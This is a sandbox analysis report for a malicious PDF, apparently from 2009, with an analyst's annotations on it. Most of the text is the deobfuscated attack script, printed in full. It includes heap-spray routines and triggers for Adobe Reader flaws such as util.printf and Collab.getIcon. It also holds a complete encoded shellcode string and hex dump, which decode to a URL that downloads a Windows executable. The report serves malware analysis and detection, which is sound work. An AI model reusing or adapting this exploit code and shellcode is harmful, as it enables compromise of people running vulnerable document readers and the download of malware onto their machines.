Analysis report for 666.pdf
Sample Overview
| File | 666.pdf |
|---|
| MD5 | 8b1a51743f4579cb8a338215acae5318 |
| Analysis Started | 2009-07-22 09:47:38 |
| Report Generated | 2009-07-22 09:47:45 |
| Jsand version | 1.03.02 |
Detection results
| Detector | Result |
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
| Adobe getIcon | Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object | CVE-2009-0927 |
Deobfuscation results
Evals
// [analyst note] First deobfuscation layer captured by the sandbox: each element of `s` is
// reduced by 15, converted to a character and appended to `p`.
// [analyst note] `s`, `p` and `i` are defined outside this listing; `p` is presumably the
// script that is evaluated next -- confirm against the sample.
for (i = 0; i < s.length; i ++ ){
p += String.fromCharCode(s[i] - 15);
}
(repeated 1 time)
// [analyst note] Shellcode string as recovered by the sandbox. Each %uXXXX unit is one
// 16-bit character, so the bytes appear pairwise swapped (little-endian) in this report's
// "Shellcode and Malware" hex dump.
// [analyst note] The hex dump contains the byte run `80 30 21 40 e2 fa` shortly after the
// 0x0a filler, which looks like a single-byte XOR decode loop with key 0x21 -- confirm by
// disassembly before relying on it.
// [analyst note] XORing the readable tail of the dump with 0x21 yields the URL listed in the
// report's "Additional (potential) malware" table; the trailing %u2121 padding then decodes
// to NUL bytes. That URL and the listed MD5 are the network/file indicators for this sample.
// [analyst note] The literal is line-wrapped by the report, so this listing is not valid
// JavaScript as printed.
var payload = unescape("%u0A0A%u0A0A%u0A0A" + "
%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9
%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE
%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA
%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040
%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121
%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9
%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720
%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F
%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA
%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112
%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6
%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121
%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0
%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520
%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D
%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE
%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A
%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B
%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121
%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A
%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120
%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123
%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971
%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921
%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7
%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971
%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125
%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121
%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120
%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121
%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120
%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121
%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120
%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE
%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121
%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE
%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121
%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE
%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121
%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE
%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88
%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9
%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961
%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924
%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1
%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B
%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0E1B%u520E%u534A
%u4F40%u4455%u0F4F%u4E42%u0E4C%u4851%u0E42%u5B54%u0F51%u4951%u2151%u2121%u2121%u2121%u2121
%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121
%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121
%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021");
//-------
// [analyst note] `memory` is a global that New_Script fills; it is not read again in this listing.
var memory;
// [analyst note] New_Script(payload): reached only from the `version >= 9` branch of this
// listing. It builds a filler string of 0x9090 units, stores 0x6ff0 copies of filler + payload
// in `memory`, then calls start(), which invokes this.spell.customDictionaryOpen(0, nop).
// [analyst note] The report's Exploits table has no entry for customDictionaryOpen or
// getAnnots, and its recorded-methods table lists neither call, so this path was apparently
// not exercised in the sandbox run -- confirm before treating it as covered by the verdict.
// [analyst note] Detection-relevant features: the two API names, the literal 0x6ff0 loop
// bound, and the 0x100000 / 2 string length. Comments without the [analyst note] tag are the
// sample author's own and are kept verbatim.
function New_Script(payload){
//var payload;
//if(adobe9)//adobe reader 8 works also with app.setTimeOut?
//var startwith = app.alert('Hi');//required for adobe9
// [analyst note] "\%" is an unnecessary escape; the string is the same as "%u9090%u9090".
var nop = unescape(
"\%u9090\%u9090");
//long nop will also force the address to go to 0x90909090 so 2 steps in one ;)
var
shellcode = payload;
// [analyst note] Doubles the filler past 0x100000 / 2 characters, then trims it so that
// filler + shellcode is exactly 0x100000 / 2 characters long.
while (nop.length <= 0x100000 / 2)nop += nop;
nop = nop.substring(0, 0x100000 / 2 - shellcode.length);
memory = new Array();
// [analyst note] `i` is not declared here, so it is an implicit global.
for (i = 0; i < 0x6ff0; i ++ )//we should at least overwrite 0x90909090
{
memory[i] = nop + shellcode;
}
//start exploit now
start();
// [analyst note] start2 is defined but never called in the visible code.
function start2(){
this .getAnnots( - 134217728 ,- 134217728 ,- 134217728 ,- 134217728);
}
// [analyst note] start is hoisted, which is why the call above precedes its definition.
function start(){
this .spell.customDictionaryOpen(0, nop);
//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second para
m to go to 0x41414141 ;)
}
}
//-------
// [analyst note] Global array filled by the Collab.getIcon branch later in this listing.
var arry = new Array();
// [analyst note] fix_it(yarsp, len): repeats `yarsp` by doubling until its length times two
// reaches `len`, then returns the first len / 2 characters. `len` therefore looks like a byte
// count with two bytes per string character -- presumably UTF-16 units, confirm.
// Called by the `version < 8` and Collab.getIcon branches to build their filler strings.
function fix_it(yarsp, len){
while (yarsp.length * 2 < len){
yarsp += yarsp;
}
yarsp = yarsp.substring(0, len / 2);
return yarsp;
}
// [analyst note] The script selects a code path from the viewer version. The branches below
// are independent `if` statements, so more than one can run for the same version (for
// example, a version above 8 and below 9.1 reaches both util.printf and Collab.getIcon).
// The report's recorded-methods table lists exactly those two calls, once each.
var version = app.viewerVersion;
// [analyst note] Branch for version > 8: ends in util.printf("%45000f", num), which the
// report's Exploits table maps to CVE-2008-2992. The recorded call shows the arguments
// "%45000f" and 1.3E295.
// [analyst note] Detection-relevant features: util.printf with a very wide float field and a
// numeric literal several hundred digits long, preceded by 1400 large string allocations.
if (version > 8){
// [analyst note] A `var` redeclaration without an initializer does not reset the variable, so
// `payload` still holds the unescape()d string assigned earlier in the listing.
var payload;
// [analyst note] As captured, the next line lacks a separator between the two assignments;
// the listing is not valid JavaScript as printed.
nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")heapblock = nop + payload;
bigblock = unescape("%u0A0A%u0A0A");
headersize = 20;
spray = headersize + heapblock.length;
while (bigblock.length < spray)bigblock += bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 0x40000)block = block + block + fillblock;
mem = new Array();
for (i = 0; i < 1400; i ++ )mem[i] = block + heapblock;
// [analyst note] The numeric literal is line-wrapped by the report.
var num =
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
util.printf("%45000f", num);
}
// [analyst note] Branch for version < 8: fills `mem_array` with fix_it()-built 0x9090 filler
// plus payload, then passes a string of at least 44952 0x0c0c units as `msg` to
// Collab.collectEmailInfo.
// [analyst note] The report's Exploits table has no entry for collectEmailInfo and the
// recorded-methods table does not list the call, so this branch was apparently not reached
// in the sandbox run -- confirm before treating it as covered by the verdict.
// [analyst note] Detection-relevant features: Collab.collectEmailInfo called from document
// JavaScript with a very long `msg` value.
if (version < 8){
// [analyst note] Redeclaration without initializer; `payload` keeps its earlier value.
var payload;
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = payload.length * 2;
var len = addr - (sc_len + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
// [analyst note] Number of entries: (0x0c0c0c0c - 0x400000) / 0x400000, a non-integer bound.
var count2 = (cc - 0x400000) / addr;
for (var count = 0; count < count2; count ++ ){
mem_array[count] = yarsp + payload;
}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952)overflow += overflow;
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : overflow
}
);
}
// [analyst note] Branch for version < 9.1, taken only when app.doc.Collab.getIcon exists:
// fills the global `arry` with filler plus payload, then calls Collab.getIcon with "N."
// followed by at least 0x4000 tab characters ("%09"). The report's Exploits table maps
// getIcon to CVE-2009-0927, and the recorded-methods table shows the call once with an
// argument starting with "N".
// [analyst note] The constants repeat those of the `version < 8` branch (0x400000, 0x38,
// 0x0c0c0c0c) under randomized identifiers, which suggests this part was obfuscated or
// generated separately -- an inference, not shown by the listing.
// [analyst note] Detection-relevant features: Collab.getIcon called from document JavaScript
// with an argument thousands of characters long.
if (version < 9.1){
if (app.doc.Collab.getIcon){
// [analyst note] Redeclaration without initializer; `payload` keeps its earlier value.
var payload;
var hWq500CN = payload.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + payload;
}
var tUMhNbGw = unescape("%09");
while (tUMhNbGw.length < 0x4000)tUMhNbGw += tUMhNbGw;
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}
// [analyst note] Branch for version >= 9: hands the shellcode string to New_Script, defined
// earlier in this listing. It overlaps the `version > 8` branch and, for versions below 9.1,
// the Collab.getIcon branch, so those run first for the same viewer.
if (version >= 9){
// [analyst note] Redeclaration without initializer; `payload` keeps its earlier value.
var payload;
New_Script(payload);
}
(repeated 1 time)
Writes
No writes.
Network Activity
Requests
ActiveX controls
-
| AcrobatJavaScript |
|
Name |
Arg0 |
Arg1 |
Count |
| Methods |
Collab.getIcon |
N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ .................................................................. |
|
1 |
| util.printf |
%45000f |
1.3E295 |
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a d9 e1
d9 34 24 58 58 58 58 33 db b3 1c 03 c3 31 c9 66
81 e9 65 fa 80 30 21 40 e2 fa c9 17 22 21 21 49
21 01 21 21 4b 21 de f1 98 21 31 21 21 aa d9 ca
24 7f d2 85 de f1 c9 d7 de de de c9 1c 22 21 21
aa d9 c9 19 21 21 21 c9 6c 20 21 21 c9 67 21 21
21 c9 fa 22 21 21 aa d9 c9 03 21 21 21 c9 65 20
21 21 c9 11 21 21 21 c9 a8 22 21 21 aa d9 c9 2d
21 21 21 c9 40 20 21 21 c9 3b 21 21 21 ca 79 72
aa fd 72 4b 61 49 21 31 21 21 76 c9 90 23 21 21
c9 c4 21 21 21 79 e2 72 aa fd 72 4b 01 49 21 31
21 21 76 c9 b8 23 21 21 c9 ec 21 21 21 79 e2 76
c9 1d 25 21 21 aa d9 12 e8 68 12 e1 91 e2 dd d3
8f ac 66 de 7e e2 7a 1f e7 26 99 1f a8 7e 20 47
1f e6 66 24 de c1 e2 c8 b4 25 21 21 7a a0 cd 35
20 21 21 aa f5 1f e6 23 42 4c 45 01 1f e6 63 25
0e 42 01 03 a2 e3 29 12 e1 71 71 49 25 20 21 21
73 72 71 c9 e0 22 21 21 de f1 aa dd aa e6 a2 e1
29 1f ab 39 a5 fa 55 22 61 ca d7 1f e7 21 03 12
f3 1f a9 71 20 a2 cd 75 12 e1 12 fa aa ed a2 d9
75 5c 28 1f a8 3d 20 a2 e1 25 ca d3 aa ed aa f8
a2 e2 31 12 e1 1f e6 62 0d 20 21 21 21 70 72 71
71 71 71 71 71 76 71 c9 18 22 21 21 c9 38 21 21
21 45 80 25 21 21 21 ac 81 41 de de de c9 16 22
21 21 12 fa 72 72 72 72 de f1 a1 19 c9 a1 19 c8
54 2e a0 59 24 b1 b1 b1 b1 55 27 74 aa cd ac 61
24 de c1 c9 0f de de de e2 c9 09 de de de 99 30
20 25 a1 e3 2d 21 c9 3a de de de 12 e1 71 75 c9
75 21 21 21 71 c9 aa 23 21 21 de f1 17 a1 1d 05
21 56 2b c9 60 23 21 21 12 de 76 de f1 c9 da 20
21 21 49 de 21 21 21 de f1 c9 c9 df de de 72 76
77 12 e1 71 75 c9 3f 21 21 21 71 c9 74 23 21 21
de f1 17 a1 1d 05 21 56 2b c9 2a 23 21 21 12 de
76 de f1 79 7f 7e 7a e2 ca 23 79 e2 c9 d8 de de
de 77 76 a2 cd 29 aa dd 4b 29 76 1f de 56 35 c9
7c 23 21 21 de f1 aa dd 49 40 4c 44 21 49 68 64
67 53 aa d5 98 29 21 21 21 d2 87 54 0e 4b 21 1f
de 55 05 01 c9 05 23 21 21 de f1 aa d9 c9 ea 20
21 21 de f1 1a d9 55 29 17 aa 65 05 01 1f de 21
1f de 55 05 3d c9 ce 20 21 21 de f1 a2 e5 31 7e
7f 99 20 21 21 21 e2 49 4e 4f 21 21 49 54 53 4d
4c ca 34 ac 65 05 25 71 c9 03 df de de 71 c9 6b
23 21 21 c8 c3 df de de c9 c7 de de de a2 e5 29
e2 4b 4d 49 4f 55 45 4d ca 34 ac 65 05 25 71 c9
da dc de de 71 c9 02 23 21 21 c8 9a df de de c9
c7 de de de a2 e5 29 e2 49 12 13 21 21 49 54 52
44 53 ca 34 ac 65 05 25 71 c9 f0 dc de de 71 c9
d8 20 21 21 c8 b0 df de de c9 c7 de de de a2 e5
29 e2 49 42 57 56 21 49 52 49 45 4e ca 34 ac 65
05 25 71 c9 86 dc de de 71 c9 ee 20 21 21 c8 46
df de de c9 c7 de de de a2 e5 29 e2 49 57 46 59
21 ca 34 ac 65 05 25 71 c9 a3 dc de de 71 c9 8b
20 21 21 c8 63 df de de c9 c7 de de de a2 e5 25
e2 c9 8a 20 21 21 49 3a e7 67 58 71 c9 e7 20 21
21 a2 e5 29 e2 c9 b6 20 21 21 49 cd b6 22 2d 71
c9 93 20 21 21 a2 e5 29 e2 c9 a2 20 21 21 49 8b
dd 2c 5d 71 c9 bf 20 21 21 a2 e5 29 e2 c9 4e 20
21 21 49 cc 77 ce 17 71 c9 ab 20 21 21 a2 e5 29
e2 c9 7a 20 21 21 49 d1 ab 25 7e 71 c9 57 20 21
21 a2 e5 29 e2 c9 d6 df de de 49 59 49 fa 3d 71
c9 43 20 21 21 a2 e5 29 e2 c9 12 20 21 21 49 ce
ef c1 41 71 c9 6f 20 21 21 a2 e5 29 e2 c9 3e 20
21 21 49 91 68 0c fa 71 c9 1b 20 21 21 a2 e5 29
e2 c9 17 de de de 49 8a 7f ba 3f 71 c9 07 20 21
21 a2 e5 29 e2 c9 86 df de de 49 78 b6 a0 23 71
c9 33 20 21 21 a2 e5 29 e2 c9 c2 21 21 21 49 5f
f9 c3 52 71 c9 df 21 21 21 a2 e5 29 e2 c9 ee 21
21 21 49 bf d8 9a 14 71 c9 cb 21 21 21 a2 e5 29
e2 c9 b3 df de de 49 76 81 94 9a 71 c9 f7 21 21
21 a2 e5 29 e2 c9 5f df de de 49 3b 5b 3f 23 71
c9 e3 21 21 21 a2 e5 29 e2 c9 4b df de de 49 c1
7a 11 b5 71 c9 8f 21 21 21 a2 e5 29 e2 c9 77 df
de de 49 b6 e8 c3 82 71 c9 bb 21 21 21 a2 e5 29
e2 c9 63 df de de 49 49 05 e4 92 71 c9 a7 21 21
21 a2 e5 29 e2 c9 76 21 21 21 49 53 df 92 37 71
c9 53 21 21 21 a2 e5 29 e2 c9 65 df de de ca 32
4b 44 71 c9 d6 da de de 71 c9 8a df de de c8 96
dd de de c9 c9 de de de e2 c9 88 dc de de 49 6e
ce 6e 24 71 c9 1f 21 21 21 a2 e5 29 e2 c9 2e 21
21 21 49 af 6f 2f cd 71 c9 0b 21 21 21 a2 e5 29
e2 12 e1 45 aa 61 11 a4 e1 59 31 1f aa 61 2d 1f
aa 51 3d 8c 1f aa 61 29 e2 ca 2a 1f aa 61 15 a2
e1 5d 1f aa 61 1d e2 41 17 aa 4d 05 05 17 aa 64
1d 17 aa 75 24 59 22 f4 1f aa 6b 39 1f aa 7b 01
22 fc c2 1a 68 1f aa 15 aa 22 d4 12 de 12 e1 dd
8d a5 e1 55 26 e0 ee 2c 22 d9 ca d5 17 1a 5d 05
09 54 fe 1f aa 7b 05 22 fc 47 1f aa 2d 6a 1f aa
7b 3d 22 fc 1f aa 25 aa 22 e4 17 a8 65 05 3d 40
e2 c9 47 da de de 49 55 55 51 1b 0e 0e 52 4a 53
40 4f 55 44 4f 0f 42 4e 4c 0e 51 48 42 0e 54 5b
51 0f 51 49 51 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 21 21 21 21 21 21 21 21 21 21 21
21 21 21 21 21 00 | ................
.4$XXXX3.....1.f
..e..0!@...."!!I
!.!!K!...!1!!...
$............"!!
....!!!.l !!.g!!
!.."!!....!!!.e
!!..!!!.."!!...-
!!!.@ !!.;!!!.yr
..rKaI!1!!v..#!!
..!!!y.r..rK.I!1
!!v..#!!..!!!y.v
..%!!....h......
..f.~.z..&...~ G
..f$.....%!!z..5
!!....#BLE...c%
.B....)..qqI% !!
srq.."!!........
)..9..U"a....!..
...q ..u........
u\(..= ..%......
..1....b. !!!prq
qqqqqvq.."!!.8!!
!E.%!!!..A....."
!!..rrrr........
T..Y$....U't...a
$..............0
%..-!.:.....qu.
u!!!q..#!!......
!V+.`#!!..v....
!!I.!!!.......rv
w..qu.?!!!q.t#!!
......!V+.*#!!..
v..y.~z..#y.....
.wv..)..K)v..V5.
|#!!....I@LD!Ihd
gS...)!!!..T.K!.
.U....#!!......
!!....U)..e....!
..U.=.. !!....1~
.. !!!.INO!!ITSM
L.4.e.%q.....q.k
#!!............)
.KMIOUEM.4.e.%q.
....q..#!!......
......).I..!!ITR
DS.4.e.%q.....q.
. !!............
).IBWV!IRIEN.4.e
.%q.....q.. !!.F
..........).IWFY
!.4.e.%q.....q..
!!.c..........%
... !!I:.gXq.. !
!..)... !!I.."-q
.. !!..)... !!I.
.,]q.. !!..)..N
!!I.w..q.. !!..)
..z !!I..%~q.W !
!..)......IYI.=q
.C !!..)... !!I.
..Aq.o !!..)..>
!!I.h..q.. !!..)
......I...?q.. !
!..)......Ix..#q
.3 !!..)...!!!I_
..Rq..!!!..)...!
!!I....q..!!!..)
......Iv...q..!!
!..).._...I;[?#q
..!!!..)..K...I.
z..q..!!!..)..w.
..I....q..!!!..)
..c...II...q..!!
!..)..v!!!IS..7q
.S!!!..)..e....2
KDq.....q.......
..............In
.n$q..!!!..)...!
!!I.o/.q..!!!..)
...E.a...Y1..a-.
.Q=...a)..*..a..
.]..a..A..M....d
...u$Y"...k9..{.
"...h...."......
...U&..,".....].
.T...{.".G..-j..
{="...%."...e.=@
..G...IUUQ...RJS
@OUDO.BNL.QHB.T[
Q.QIQ!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!. |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
| http://skranten.com/pic/uzp.php |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
ce03c95ab093fa038c0224a3e6187a65 |
|